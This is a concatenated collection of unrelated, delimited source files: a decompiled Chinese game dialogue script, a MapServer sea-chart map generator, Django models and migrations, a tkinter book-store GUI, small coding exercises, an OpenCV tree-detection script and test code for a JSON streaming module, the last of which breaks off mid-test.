"我……为了要看看\x01",
"和爸爸战斗的对手是什么样的人,\x01",
"自己一个人登上了这座钟楼……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
"但是……就连逃跑的机会都没有,钟楼突然倒塌了。\x02",
)
CloseMessageWindow()
OP_56(0x0)
OP_AE(0xC8)
Sleep(2000)
OP_AD(0x4001A, 0x0, 0x0, 0x64)
Sleep(3000)
SetChrName("艾丝蒂尔")
AnonymousTalk(
(
"不过,当我回过神来的时候,\x01",
"却发现自己毫发无伤……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
"是妈妈……保护了我……\x02",
)
CloseMessageWindow()
AnonymousTalk(
(
"她用双臂紧紧地抱着我,\x01",
"为我挡住了大量瓦砾的撞击。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"而且,还为哭个不停的我\x01",
"唱起了我最喜欢的摇篮曲……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
"然后……然后……\x02",
)
CloseMessageWindow()
AnonymousTalk(
"当瓦砾被清除之后……\x02",
)
CloseMessageWindow()
OP_56(0x0)
OP_AE(0x64)
FadeToBright(2000, 0)
OP_0D()
Sleep(2000)
ChrTalk(
0x101,
(
"#003F#2P………………………\x02\x03",
"……战争结束了,\x01",
"这里也被修复成原来的样子。\x01",
"不过自那以后,我就很少来过……\x02\x03",
"因为那是一段非常痛苦的回忆……\x02\x03",
"#500F一来到这里,\x01",
"心里就不由得有种想要依赖妈妈的感觉……\x02\x03",
"可是,要是依赖了妈妈,\x01",
"就不能像妈妈那样坚强起来了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#013F#6P艾丝蒂尔……\x02",
)
CloseMessageWindow()
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
(
"#501F#2P不过,没关系吧?\x01",
"至少今天让我依赖一下……\x02\x03",
"让我向妈妈祈求,\x01",
"保佑爸爸平安归来也好……\x02\x03",
"让我向妈妈祈求,\x01",
"在天国一直守护着爸爸也好……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#015F#6P……当然可以了。\x02",
)
CloseMessageWindow()
def lambda_192E():
OP_6D(53840, 10300, 44180, 1500)
ExitThread()
QueueWorkItem(0x0, 1, lambda_192E)
OP_92(0x102, 0x101, 0x1F4, 0x3E8, 0x0)
WaitChrThread(0x0, 0x1)
ChrTalk(
0x102,
(
"#012F#6P放心吧……\x01",
"父亲一定会平安无事的。\x02\x03",
"有你母亲守护着他,\x01",
"一定会没事的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#003F#2P…………………………\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F#6P就算万一真的出了问题,\x01",
"还有艾丝蒂尔你可以帮助他啊。\x02\x03",
"以前母亲救了你,\x01",
"这次该由你去救父亲了。\x02\x03",
"我也会帮忙的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#003F#2P……约修亚…………\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#013F#6P你的心情,\x01",
"我虽然不能完全体会……\x02\x03",
"不过像这样呆在你身边……\x01",
"我还是能做到的。\x02\x03",
"#010F如果不介意的话,\x01",
"我的胸膛随时可以借你一用。\x02\x03",
"所以……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#500F#2P…………………………\x02\x03",
"#008F……………噗~\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#014F#6P哎?\x02",
)
CloseMessageWindow()
OP_20(0x5DC)
OP_21()
OP_1D(0x1)
ChrTalk(
0x101,
(
"#001F#2P啊哈哈哈哈~!\x01",
"约修亚你在耍什么帅啊~\x02\x03",
"真是的……\x01",
"这种话你也能这么随便说出来。\x02",
)
)
CloseMessageWindow()
OP_62(0x102, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
def lambda_1C5E():
OP_6D(54620, 10300, 44190, 700)
ExitThread()
QueueWorkItem(0x0, 1, lambda_1C5E)
OP_8F(0x102, 0xD7D2, 0x283C, 0xAC76, 0xBB8, 0x0)
Sleep(1000)
ChrTalk(
0x102,
"#014F#6P哎、哎哎……?\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#507F#2P如果是其它女孩的话,\x01",
"肯定会完全误解啦。\x02\x03",
"约修亚你啊,\x01",
"将来准是个整日被绯闻缠身的男人。\x02\x03",
"#007F呼~\x01",
"做姐姐的还真是担心啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#012F#6P真、真是抱歉,我这么随便。\x02\x03",
"#013F真是的……\x01",
"人家特意这么关心你。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#008F#2P嘿嘿……\x01",
"谢谢你的鼓励啦。\x02\x03",
"不管怎么说,有点干劲了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#018F#6P哼,你能这样说,\x01",
"我刚才装帅也是值得了。\x02\x03",
"#017F真是……唉唉。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#001F#2P别在意,别在意。\x01",
"我刚才不是说了谢谢嘛。\x02\x03",
"#006F那么……\x01",
"我们该下去了吧?\x02\x03",
"雪拉姐肯定在等着了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F#6P是啊,我们下去吧。\x02",
)
CloseMessageWindow()
def lambda_1FCF():
OP_6D(54240, 10300, 47980, 4000)
ExitThread()
QueueWorkItem(0x0, 1, lambda_1FCF)
def lambda_1FE7():
OP_67(0, 6220, -10000, 4000)
ExitThread()
QueueWorkItem(0x1, 1, lambda_1FE7)
def lambda_1FFF():
OP_6C(324000, 4000)
ExitThread()
QueueWorkItem(0x0, 2, lambda_1FFF)
def lambda_200F():
OP_6E(470, 4000)
ExitThread()
QueueWorkItem(0x1, 2, lambda_200F)
OP_43(0x102, 0x0, 0x0, 0xA)
Sleep(3000)
SetChrFlags(0x102, 0x4)
OP_8E(0x101, 0xCD12, 0x283C, 0xB5C7, 0xBB8, 0x0)
Sleep(1000)
ChrTalk(
0x101,
"#500F……………………\x02",
)
CloseMessageWindow()
OP_8C(0x101, 135, 400)
Sleep(1000)
ChrTalk(
0x101,
(
"#006F(妈妈,\x01",
" 我终于明白了……)\x02\x03",
"(我以游击士作为自己的目标,\x01",
" 是因为想像妈妈那样\x01",
" 为了保护别人而变得坚强起来……)\x02\x03",
"(所以,请等着我……)\x02\x03",
"(我一定……\x01",
" 我一定会把爸爸平安带回来的!)\x02",
)
)
CloseMessageWindow()
FadeToDark(2000, 0, -1)
OP_43(0x101, 0x0, 0x0, 0xB)
OP_0D()
SetChrFlags(0x102, 0x80)
SetMapFlags(0x2000000)
OP_A2(0x3FB)
NewScene("ED6_DT01/T0100 ._SN", 113, 0, 0)
IdleLoop()
Return()
# Function_9_10D1 end
def Function_10_2161(): pass
label("Function_10_2161")
SetChrFlags(0x102, 0x4)
OP_8E(0x102, 0xCC9C, 0x283C, 0xB536, 0x7D0, 0x0)
OP_8E(0x102, 0xCC88, 0x283C, 0xBB08, 0x7D0, 0x0)
OP_8E(0x102, 0xCE72, 0x283C, 0xBB94, 0x7D0, 0x0)
SetChrFlags(0x102, 0x4)
OP_8C(0x102, 270, 400)
OP_96(0x102, 0xD1C4, 0x251C, 0xBCA4, 0x258, 0x1388)
Sleep(500)
OP_8F(0x102, 0xD1C4, 0x206C, 0xBCA4, 0xBB8, 0x0)
SetChrFlags(0x102, 0x80)
Return()
# Function_10_2161 end
def Function_11_21E4(): pass
label("Function_11_21E4")
SetChrFlags(0x101, 0x4)
OP_8E(0x101, 0xCC88, 0x283C, 0xBB08, 0x7D0, 0x0)
OP_8E(0x101, 0xCE72, 0x283C, 0xBB94, 0x7D0, 0x0)
OP_8C(0x101, 270, 400)
OP_96(0x101, 0xD1C4, 0x251C, 0xBCA4, 0x258, 0x1388)
Sleep(500)
OP_8F(0x101, 0xD1C4, 0x206C, 0xBCA4, 0xBB8, 0x0)
SetChrFlags(0x101, 0x80)
Return()
# Function_11_21E4 end
SaveToFile()
Try(main)
|
#!/usr/bin/python2
from __future__ import print_function
import os
import csv
import re
import subprocess
from string import Template
from osgeo import ogr
from .chartsymbols import ChartSymbols
from utils import dirutils
def generate_includes(includes_dir, theme):
# Get all includefiles with the correct theme
includes = [inc for inc in os.listdir(
includes_dir) if inc.startswith(theme)]
# We need to sort them to have them appear in correct order in the target
# map file
includes.sort()
rel_includes_path = os.path.basename(includes_dir)
# Update the list, adding mapserver keyword and relative path to the
# include files
for i, item in enumerate(includes):
includes[i] = str.format("INCLUDE \"{}/{}\"", rel_includes_path, item)
return "\n ".join(includes)
def get_dictionary(theme, map_path, fonts_path, debug_string):
return {'THEME': theme,
'HOST': 'http://localhost/cgi-bin/mapserv.fcgi',
'DEBUG': debug_string,
'MAP_PATH': map_path,
'FONTS_PATH': fonts_path,
'INCLUDES': generate_includes(os.path.join(map_path, "includes"),
theme),
'SHAPEPATH': "../shape/"
}
debug_template = '''CONFIG "MS_ERRORFILE" "/tmp/SeaChart_{0}.log"
DEBUG 5
CONFIG "ON_MISSING_DATA" "LOG"'''
def create_capability_files(template_path, themes_path, map_path, fonts_path,
use_debug, shapepath):
template = Template(
open(os.path.join(template_path, "SeaChart_THEME.map"), 'r').read())
for theme in os.listdir(themes_path):
# Remove file suffix
theme = os.path.splitext(theme)[0]
debug_string = ""
if use_debug:
debug_string = str.format(debug_template, theme)
d = get_dictionary(theme, map_path, fonts_path, debug_string)
if shapepath:
d['SHAPEPATH'] = shapepath
fileout = open(os.path.join(
map_path, "SeaChart_" + theme + ".map"), 'w')
fileout.write(template.substitute(d))
def create_legend_files(template_path, themes_path, map_path, fonts_path,
use_debug):
with open(os.path.join(template_path, "SeaChart_Legend_THEME.map")) as f:
template = Template(f.read())
for theme in os.listdir(themes_path):
# Remove file suffix
theme = os.path.splitext(theme)[0]
debug_string = ""
if use_debug:
debug_string = str.format(debug_template, theme)
d = get_dictionary(theme, map_path, fonts_path, debug_string)
legend_path = dirutils.force_sub_dir(map_path, "legends")
fileout = open(os.path.join(
legend_path, "SeaChart_Legend_" + theme + ".map"), 'w')
fileout.write(template.substitute(d))
def generate_basechart_config(data_path, map_path, rule_set_path, resource_dir,
force_overwrite, debug, point_table, area_table,
displaycategory, chartsymbols, excluded_lookups,
maxscale_shift, symbol_size_override):
# Generate new map files
dirutils.clear_folder(map_path)
if chartsymbols:
shapepath = data_path
process_all_layers(data_path, map_path, rule_set_path, point_table,
area_table, displaycategory, chartsymbols,
excluded_lookups, maxscale_shift,
symbol_size_override)
fonts_path = os.path.join("./fonts", "fontset.lst")
create_capability_files(os.path.join(resource_dir, "templates"),
os.path.join(rule_set_path, "color_tables"),
map_path, fonts_path, debug, shapepath)
create_legend_files(os.path.join(resource_dir, "templates"),
os.path.join(rule_set_path, "color_tables"),
map_path, fonts_path, debug)
dirutils.copy_and_replace(os.path.join(
resource_dir, "epsg"), os.path.join(map_path, "epsg"))
dirutils.copy_and_replace(os.path.join(
resource_dir, "symbols"), os.path.join(map_path, "symbols"))
dirutils.copy_and_replace(os.path.join(
resource_dir, "fonts"), os.path.join(map_path, "fonts"))
def get_maxscaledenom(config):
#
# Read max scale denom values from a resource file (layer_msd.csv)
#
msd = {}
with open(config + '/layer_rules/layer_msd.csv', 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
msd[row[0]] = row[1]
return msd
def get_colors(color_table):
#
# Make an associative array with colors based on the color CSV file
# code, rgb_color, hex_color
#
colors = {}
with open(color_table, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
colors[row[0]] = (row[1], row[2])
return colors
def process_all_layers(data, target, config, point_table='Simplified',
area_table='Plain', displaycategory=None,
chartsymbols_file=None, excluded_lookups=None,
maxscale_shift=None,
symbol_size_override=None):
# Reimplementation of the shel script of the same name
msd = get_maxscaledenom(config)
chartsymbols = None
if chartsymbols_file:
chartsymbols = ChartSymbols(
chartsymbols_file, point_table, area_table, displaycategory,
excluded_lookups=excluded_lookups,
symbol_size_override=symbol_size_override,
maxscale_shift=maxscale_shift,
)
# Test if the shapefile is of the right Geometry
shp_types = {}
shp_fields = {}
if chartsymbols:
geometries = {
'Point': 'POINT',
'Line': 'LINESTRING',
'Polygon': 'POLYGON',
'3D Point': 'POINT',
}
print("Check geometry of all layers...")
for (dirpath, dirnames, filenames) in os.walk(data):
for filename in filenames:
if filename.endswith('.shp'):
level = filename[2:3]
print("checking {}".format(filename),
end=(' ' * 18 + '\r'), flush=True)
output = subprocess.check_output(
["ogrinfo", "-al", "-so",
'{}/{}/{}'.format(data, level, filename)],
stderr=subprocess.STDOUT).decode()
geomtype = re.search(
r'Geometry: (.+)$', output, re.IGNORECASE)
if geomtype:
try:
shp_types[filename] = geometries[geomtype.group(1)]
except KeyError:
shp_types[filename] = 'UNKNOWN'
ds = ogr.Open('{}/{}/{}'.format(data, level, filename))
try:
layer = ds.GetLayer()
defn = layer.GetLayerDefn()
shp_fields[filename] = [
defn.GetFieldDefn(i).GetName()
for i in range(defn.GetFieldCount())
]
finally:
ds.Destroy()
#
# Process all color themes
#
for color in os.listdir(config + '/color_tables/'):
print("Loading " + color)
# theme = os.path.splitext("path_to_file")[0]
if chartsymbols:
chartsymbols.load_colors(color[:-4])
for layer in os.listdir(data):
if not layer.isdigit():
continue
color_table = config + '/color_tables/' + color
input_file = config + '/layer_rules/layer_groups.csv'
process_layer_colors(layer, color_table, input_file,
msd[layer], data, target, chartsymbols,
shp_types, shp_fields)
def get_layer_mapfile(layer, feature, group, color_table, msd):
enhanced = False
# enhanced feature name
template_path = '../resources/templates/basechart_templates/'
if feature[-5:] == 'POINT':
enhanced = True
template = template_path + 'point-{}_template_color.map'.format(
feature[:-6])
elif feature[-10:] == 'LINESTRING':
enhanced = True
template = template_path + 'line-{}_template_color.map'.format(
feature[:-11])
elif feature[-7:] == 'POLYGON':
enhanced = True
template = template_path + 'poly-{}_template_color.map'.format(
feature[:-8])
else:
template = template_path + '{}_template_color.map'.format(feature)
if not enhanced:
base = "CL{}-{}".format(layer, feature)
else:
base = "CL{}_{}".format(layer, feature)
mapfile = ''
if not os.path.isfile(template):
return mapfile
colors = get_colors(color_table)
def get_hex_color(match):
return colors[match.group(1)][1]
def get_rgb_color(match):
return colors[match.group(1)][0]
# print "Layer: {} Processing feature: {}.".format(layer, feature)
with open(template, 'r') as templ:
mapfile = templ.read()
mapfile = re.sub(r'{CL}', layer, mapfile)
mapfile = re.sub(r'{PATH}', '{}/{}'.format(layer, base), mapfile)
mapfile = re.sub(r'{PATH_OGR}', '{}/{}.shp'.format(layer, base), mapfile)
mapfile = re.sub(r'{OGR_SQL_LAYER}', base, mapfile)
mapfile = re.sub(r'{MAXSCALE}', msd, mapfile)
mapfile = re.sub(r'{GROUP}', group, mapfile)
mapfile = re.sub(r'{(.....)}', get_hex_color, mapfile)
mapfile = re.sub(r'{(.....)_rgb}', get_rgb_color, mapfile)
return mapfile
def get_navigation_level(layer):
if layer == '1':
nl = 'Overview'
elif layer == '2':
nl = 'General'
elif layer == '3':
nl = 'Coastal'
elif layer == '4':
nl = 'Approach'
elif layer == '5':
nl = 'Harbour'
elif layer == '6':
nl = 'Berthing'
else:
nl = 'default'
return nl
def get_metadata_name(s57objectname):
# Extract a readable layer name
# csv file looks like this
r = s57objectname
with open('../../s57objectclasses.csv', 'r') as objFile:
reader = csv.reader(objFile)
for row in reader:
if row[2] == s57objectname:
r = row[1]
objFile.close()
return r
def process_layer_colors(layer, color_table, input_file, msd, data, target,
chartsymbols=None, shp_types={}, shp_fields={}):
# Reimplementation of the shell script of the same name
# Create directory
try:
os.mkdir(target + '/includes')
except OSError:
# Already exist
pass
theme = os.path.splitext(os.path.basename(color_table))[0]
# File that will contain the result
final_file = open(
'{}/includes/{}_layer{}_inc.map'.format(target, theme, layer), 'w')
if not chartsymbols:
with open(input_file, 'r') as if_csv:
reader = csv.reader(if_csv)
next(reader, None) # skip the headers
for row in reader:
feature = row[0]
group = row[1]
data_file = '{0}/{1}/CL{1}-{2}.shp'.format(
data, layer, feature)
if os.path.isfile(data_file):
mapfile = get_layer_mapfile(
layer, feature, group, color_table, msd)
if mapfile:
final_file.write(mapfile)
else:
layers = []
for (base, dirs, filenames) in os.walk('{0}/{1}/'.format(data, layer)):
for filename in filenames:
if filename.endswith('.shp'):
feature = os.path.splitext(filename)[0][4:10]
geom = os.path.splitext(filename)[0][11:]
if shp_types and not shp_types[filename] in geom:
print("{} does not match geometry: {} in {}".format(
filename, shp_types[filename], geom))
continue
# we will push a readable name in metadata for this layer
metadata_name = get_metadata_name(feature)
# we will push a readdable Group name based on Navigation
# level
group_layer = get_navigation_level(layer)
if geom == 'POINT':
layer_obj = chartsymbols.get_point_mapfile(
layer, feature, group_layer, msd,
shp_fields[filename], metadata_name)
elif geom == 'LINESTRING':
layer_obj = chartsymbols.get_line_mapfile(
layer, feature, group_layer, msd,
shp_fields[filename], metadata_name)
elif geom == 'POLYGON':
layer_obj = chartsymbols.get_poly_mapfile(
layer, feature, group_layer, msd,
shp_fields[filename], metadata_name)
else:
continue
layers.append(layer_obj)
final_file.write('\n'.join(l.mapfile for l in sorted(layers) if l))
final_file.write("""
#
# Dummy layer to flush the label cache
#
LAYER
NAME "force_label_draw_CL${CL}"
GROUP %s
TYPE POINT
PROCESSING FORCE_DRAW_LABEL_CACHE=FLUSH
TRANSFORM FALSE
STATUS ON
FEATURE
POINTS 1 1 END
END
METADATA
"ows_title" "Force layer to flush cache"
"ows_enable_request" "* !GetFeatureInfo"
"gml_include_items" "all"
"wms_feature_mime_type" "text/html"
END
END
""" % get_navigation_level(layer))
final_file.close()
|
from PIL import Image
from jieba import *
from numpy import *
from matplotlib.pyplot import *
from wordcloud import *
from collections import *
figure=figure()
data=open('19.txt').read()
words=cut(data,cut_all=False)
remove_words=[u'\n',u'\t',u'。',u',',u'、',u'的',u'和']#还有更多无意义词汇 这里只是举例
words_list=[]
for word in words :
if word not in remove_words:
words_list.append(word)
words_counts=Counter(words_list)
word_top10=words_counts.most_common(10)
for word_top in word_top10:
print(str(word_top[0]),str(word_top[1]))
background=array(Image.open('map.png'))
words_config=WordCloud(mask=background,scale=8,prefer_horizontal=1,max_font_size=100,max_words=len(words_list),colormap='Reds',font_path='C:/Windows/Fonts/simhei.ttf',background_color='white')
words_config.generate_from_frequencies(words_counts)
imshow(words_config)
axis('off')
figure.set_size_inches(1024/100,1024/100)
subplots_adjust(bottom=0.05,top=0.95,right=1,left=0)
savefig('19.jpg',dpi=500)
show()
如果觉得本视频有用,请素质三连支持一波!谢谢!
BY TONYMOT |
#-*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
import datetime
# Create your models here.
class Person(models.Model):
name = models.CharField(max_length=30)
age = models.IntegerField()
def __unicode__(self):
return self.name
class Subject(models.Model):
title = models.CharField(max_length=30)
createtime = models.DateField(auto_now_add=True)
deadline = models.DateTimeField(auto_now_add=False,auto_now=False,default=timezone.now())
#status = models.BooleanField(default=True)
hot = models.CharField(max_length=60,default=u'无人得票')
class Meta:
ordering = ['-createtime']
def __unicode__(self):
return self.title
class Option(models.Model):
subject = models.ForeignKey(Subject)
name = models.CharField(max_length=30)
def __unicode__(self):
return self.name
class VoteRecord(models.Model):
user = models.ForeignKey(User)
option = models.ForeignKey(Option)
def __unicode__(self):
return u'%s' % self.id
|
class Solution(object):
def validWordSquare(self, words):
word_mat = [list(word) for word in words]
for word in word_mat:
word += [None]*(len(words[0])-len(word))
word_tra = [list(i) for i in zip(*word_mat)]
return word_mat == word_tra |
"""
A program that stores book information:
Title, Author, Year, ISBN
User can:
View all records
Search all entry
Add entry
Update entry
Delete entry
Close app
"""
from tkinter import *
import backend
# def get_selected_row(event):
# global selected_tuple
# if list1.size() > 0:
# index = list1.curselection()[0]
# selected_tuple = list1.get(index)
# e1.delete(0, END)
# e1.insert(END, selected_tuple[1])
# e2.delete(0, END)
# e2.insert(END, selected_tuple[2])
# e3.delete(0, END)
# e3.insert(END, selected_tuple[3])
# e4.delete(0, END)
# e4.insert(END, selected_tuple[4])
def get_selected_row(event):
global selected_tuple
try:
index = list1.curselection()[0]
selected_tuple = list1.get(index)
e1.delete(0, END)
e1.insert(END, selected_tuple[1])
e2.delete(0, END)
e2.insert(END, selected_tuple[2])
e3.delete(0, END)
e3.insert(END, selected_tuple[3])
e4.delete(0, END)
e4.insert(END, selected_tuple[4])
except IndexError:
pass
def view_command():
list1.delete(0, END)
for row in backend.view():
list1.insert(END, row)
def search_command():
list1.delete(0, END)
for row in backend.search(title_text.get(), author_text.get(), year_text.get(), ISBN_text.get()):
list1.insert(END, row)
def insert_command():
if (title_text.get() != "") & (author_text.get() != ""):
backend.insert(title_text.get(), author_text.get(), year_text.get(), ISBN_text.get())
view_command()
def delete_command():
backend.delete(selected_tuple[0])
view_command()
# def update_command():
# backend.update(selected_tuple[0],selected_tuple[1],selected_tuple[2],selected_tuple[3], selected_tuple[4])
def update_command():
backend.update(selected_tuple[0], e1.get(), e2.get(), e3.get(), e4.get())
view_command()
window = Tk()
window.wm_title("Book Store")
l1 = Label(window, text="Title")
l1.grid(row=0, column=0)
l2 = Label(window, text="Author")
l2.grid(row=0, column=2)
l3 = Label(window, text="Year")
l3.grid(row=1, column=0)
l4 = Label(window, text="ISBN")
l4.grid(row=1, column=2)
title_text = StringVar()
e1 = Entry(window, textvariable=title_text)
e1.grid(row=0, column=1)
author_text = StringVar()
e2 = Entry(window, textvariable=author_text)
e2.grid(row=0, column=3)
year_text = StringVar()
e3 = Entry(window, textvariable=year_text)
e3.grid(row=1, column=1)
ISBN_text = StringVar()
e4 = Entry(window, textvariable=ISBN_text)
e4.grid(row=1, column=3)
list1 = Listbox(window, height=6, width=35)
list1.grid(row=2, column=0, rowspan=6, columnspan=2)
sb1 = Scrollbar(window)
sb1.grid(row=2, column=2, rowspan=6)
list1.configure(yscrollcommand=sb1.set)
sb1.configure(command=list1.yview)
# list1.bind('<<ListboxSelect>>', get_selected_row if list1.size() > 0 else False)
list1.bind('<<ListboxSelect>>', get_selected_row)
b1 = Button(window, text="View all", width=12, command=view_command)
b1.grid(column=3, row=2)
b2 = Button(window, text="Search entry", width=12, command=search_command)
b2.grid(column=3, row=3)
b3 = Button(window, text="Add entry", width=12, command=insert_command)
b3.grid(column=3, row=4)
b4 = Button(window, text="Update", width=12, command=update_command)
b4.grid(column=3, row=5)
b5 = Button(window, text="Delete", width=12, command=delete_command)
b5.grid(column=3, row=6)
b6 = Button(window, text="Close", width=12)
b6.grid(column=3, row=7)
window.mainloop()
|
"""
Crie um programa que vai gerar cinco números aleatórios e colocar
em uma tupla.
Depois disso, mostre a listagem de números gerados e tambem indique o
menos e o maior valor que estão na tupla
"""
from random import randint
numeros = (randint(1, 100), randint(1, 100), randint(1, 100),
randint(1, 100), randint(1, 100))
print('Os números sorteados foram: ', end='')
for n in numeros:
print(f'{n} ', end='')
print(f'\nO maior valor é {max(numeros)} e o menor é {min(numeros)}') |
# This file is only intended for development purposes
from kubeflow.kubeflow.cd import base_runner
base_runner.main(
component_name="notebook_servers.notebook_server_jupyter_tensorflow",
workflow_name="nb-j-tf-build")
|
import os
import re
import time
import cv2
import numpy as np
from os.path import isfile, join
tree_classifier = cv2.CascadeClassifier('C:\\Users\\titan\\Desktop\\cv_detect\\cascade.xml')
cap = cv2.VideoCapture('C:\\Users\\titan\\Desktop\\cv_detect\\DJI_0017.MP4')
out = cv2.VideoWriter('results.avi',cv2.VideoWriter_fourcc(*'XVID'), 20, (3840, 2160))
while True:
time.sleep(.05)
ret, frame = cap.read()
if ret is True:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
trees = tree_classifier.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in trees:
image = cv2.rectangle(frame, (x, y), (x+w, y+h), (0,0,255), 2)
cv2.namedWindow('Trees',cv2.WINDOW_NORMAL)
cv2.putText(image, 'Tree', (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
cv2.imshow('Trees', image)
cv2.resizeWindow('Trees', 900,600)
out.write(image)
cv2.waitKey(1)
else:
break
out.release()
cap.release()
cv2.destroyAllWindows()
|
# coding=utf-8
from django.shortcuts import render_to_response, redirect
from article.models import Article
from comment.forms import CommentParent, CommentParentForm
def article_detail(request, **kwargs):
context = kwargs['base_context']
context['article'] = Article.objects.get(name=kwargs['article_name'])
context['commentParents'] = CommentParent.objects.filter(commentParent_article=context['article'].id)
context['form'] = CommentParentForm(request.POST)
return render_to_response('article_detail.html', context)
|
#imports
import pytest
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
#get list of available languages
list_lang = []
with open("list_lang.txt", "r") as f:
for lang in f:
list_lang.append(lang.replace("\n", ""))
#initialize parameter
def pytest_addoption(parser):
parser.addoption("--language", action = "store",
default = "en-gb", help = "Enter language:")
#set browser configurations
@pytest.fixture(scope = "function")
def browser(request):
lang = request.config.getoption("language")
if lang in list_lang:
options = Options()
options.add_experimental_option('prefs', {'intl.accept_languages': lang})
driver = webdriver.Chrome(options=options)
else:
raise pytest.UsageError("--language option is not available")
yield driver
driver.quit() |
# Generated by Django 2.0.5 on 2018-07-08 07:49
import datetime
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Item",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(default="", max_length=10)),
(
"amount",
models.DecimalField(decimal_places=2, default=1, max_digits=6),
),
],
),
migrations.CreateModel(
name="ItemsList",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=50, unique=True)),
("place", models.CharField(max_length=50)),
("group", models.CharField(blank=True, max_length=30)),
(
"date",
models.DateField(
default=datetime.date.today,
validators=[django.core.validators.RegexValidator("%Y-%m-%d")],
),
),
(
"total_amount",
models.DecimalField(decimal_places=2, default=0, max_digits=7),
),
("entry_type", models.PositiveSmallIntegerField(default=0)),
(
"user",
models.ForeignKey(
blank=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="itemlist_USERMODEL",
to=settings.AUTH_USER_MODEL,
),
),
],
options={"ordering": ["-id"], "get_latest_by": ["-date"]},
),
migrations.CreateModel(
name="MonthBudgetAmount",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"budget_amount",
models.DecimalField(decimal_places=2, default=0, max_digits=10),
),
(
"month_year",
models.DateField(
default=datetime.date(2018, 7, 1),
validators=[
django.core.validators.RegexValidator(
"(19|20)\\d\\d([- /.])(0[1-9]|1[012])\\2(0[1-9]|[12][0-9]|3[01])"
)
],
),
),
(
"user",
models.ForeignKey(
blank=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="mba_USERMODEL",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.CreateModel(
name="PackageSettings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"currency_details",
models.CharField(blank=True, default="USD", max_length=3),
),
("force_mba_update", models.CharField(default="Y", max_length=1)),
("active_paytm", models.CharField(default="N", max_length=1)),
(
"user",
models.ForeignKey(
blank=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="package_settings",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.AddField(
model_name="item",
name="items_list",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="items",
to="packages.ItemsList",
),
),
migrations.AlterUniqueTogether(
name="monthbudgetamount", unique_together={("month_year", "user")}
),
]
|
'''
Given a year, return the century it is in.
The first century spans from the year 1 up to and including the year 100,
the second - from the year 101 up to and including the year 200, etc.
Let's see some examples:
centuryFromYear(1705) // returns 18
centuryFromYear(1900) // returns 19
centuryFromYear(1601) // returns 17
centuryFromYear(2000) // returns 20
Hope you enjoy it .. Awaiting for Best Practice Codes hahaha ..
Enjoy Learning !!!
'''
def century(year):
if year % 100 != 0:
return year//100 + 1
return year//100 |
#!/usr/bin/env python3
"""
test for the Psjson module.
"""
import io
import os
import tempfile
import unittest
from base_test import PschedTestBase
from pscheduler.psjson import *
class TestPsjson(PschedTestBase):
"""
Psjson tests.
"""
def test_jsondecomment(self):
"""Test decomment"""
doc = dict(foo='foo')
doc['#bar'] = 'bar'
ret = json_decomment(doc)
# prefix removed
self.assertEqual(ret, dict(foo='foo'))
def test_sub(self):
"""Test substitute"""
doc = dict(foo='foo')
ret = json_substitute(doc, 'foo', 'bar')
# value swapped
self.assertEqual(ret, dict(foo='bar'))
def test_load(self):
"""Test loading"""
dstring = '{"foo": "bar"}'
ret = json_load(dstring)
self.assertEqual(ret, dict(foo='bar'))
dstring += 'xxxx'
# bad value
self.assertRaises(ValueError, json_load, dstring)
def test_file(self):
"""Test loading from a file"""
# PORT: Unix only
with open("/dev/null", "r") as infile:
# All we care is that it doesn't like the input.
self.assertRaises(ValueError, json_load, infile)
def test_dump(self):
doc = dict(foo='foo')
ret = json_dump(doc)
self.assertEqual(ret, '{"foo":"foo"}')
#
# JSON Streaming Classes
#
def test_RFC7464_emitter(self):
buf = io.StringIO()
emitter = RFC7464Emitter(buf)
emitter({"foo": 123})
emitter({"bar": 123})
self.assertEqual(buf.getvalue(),
'\x1e{"foo":123}\n\x1e{"bar":123}\n')
def test_RFC7464_parser(self):
buf=io.StringIO('\x1e{"foo": 123}\nXYZZY\n')
parser = RFC7464Parser(buf)
# First line is valid
